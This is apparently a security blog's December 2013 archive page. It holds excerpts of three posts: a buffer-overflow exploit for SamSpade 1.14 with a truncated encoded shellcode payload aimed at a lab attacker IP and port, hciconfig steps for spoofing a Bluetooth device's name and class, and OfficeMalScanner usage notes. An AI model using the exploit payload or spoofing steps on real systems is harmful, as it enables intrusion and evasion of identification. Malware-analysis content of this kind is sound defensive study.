
Posts

Showing posts from December, 2013

SAMSPADE BUFFER OVERFLOW VULNERABILITY

# Exploit Title: SAMSPADE 1.14 BUFFER OVERFLOW
# Date: 10-12-2013
# Exploit Author: VISHAL MISHRA & NIDHI VERMA
# Vendor Homepage: http://www.samspade.org/
# Software Link: http://www.majorgeeks.com/mg/getmirror/sam_spade,1.html
# Version: 1.1.4 (beta)
# Tested on: WINDOWS XP(sp2)

TARGET: windows xp(sp2) ip:192.168.117.129
ATTACKER: backtrack ip:192.168.117.131 PORT:443

Payload: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAj4?wTYIITYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlXhMYGpGpEPQpMYM5EaXRE4LKRrP0LKRrVl…

Spoofing Bluetooth Device Information

Step1: $hciconfig
Just as ifconfig and iwconfig do for wired and wireless network interfaces, hciconfig enumerates the Bluetooth interfaces in a system and shows some information about each card, such as its MAC address, MTU and interface name.

Step2: $hciconfig -a hci0
So now we know we have a Bluetooth interface card, hci0. It may be any of hci0, hci1, etc. As you can see in the output below, this Bluetooth device is using the OS hostname as its own device name. We will change this information so that nobody can enumerate any details about our Bluetooth device from it.
Class is a 24-bit (6 hex digit) identifier for Bluetooth devices. The class defines which hardware class a Bluetooth device belongs to, e.g.
1) 0x78020c is the class of a Phone/Smart phone,
2) 0x6e0100 is the class of a computer, etc.
Now we will try to change the default class and name of our Bluetooth device.

Step3: $hciconfig -a hci0 features
This command tells us which features our card supports.

Step4: $hciconfig -a hci0 name 'aLt' class 0x…

OfficeMalScanner Tutorial

+------------------------------------------+
|           OfficeMalScanner v0.61         |
|  Frank Boldewin / www.reconstructer.org  |
+------------------------------------------+
Usage:
--------
OfficeMalScanner <PPT, DOC or XLS file> <scan | info> <brute> <debug>

Options:
scan    - scan for several shellcode heuristics and encrypted PE-Files
info    - dumps OLE structures, offsets+length and saves found VB-Macro code
inflate - decompresses Ms Office 2007 documents, e.g. docx, into a temp dir
Switches: (only enabled if option "scan" was selected)
brute - enables the "brute force mode" to find encrypted stuff
debug - prints out disassembly resp hexoutput if a heuristic was found

If you use Ubuntu with Wine installed, type the following command in a terminal: "wine cmd.exe". This opens a Windows command prompt from which you can run OfficeMalScanner.


OfficeMalScanner Output


Click Here to download test.doc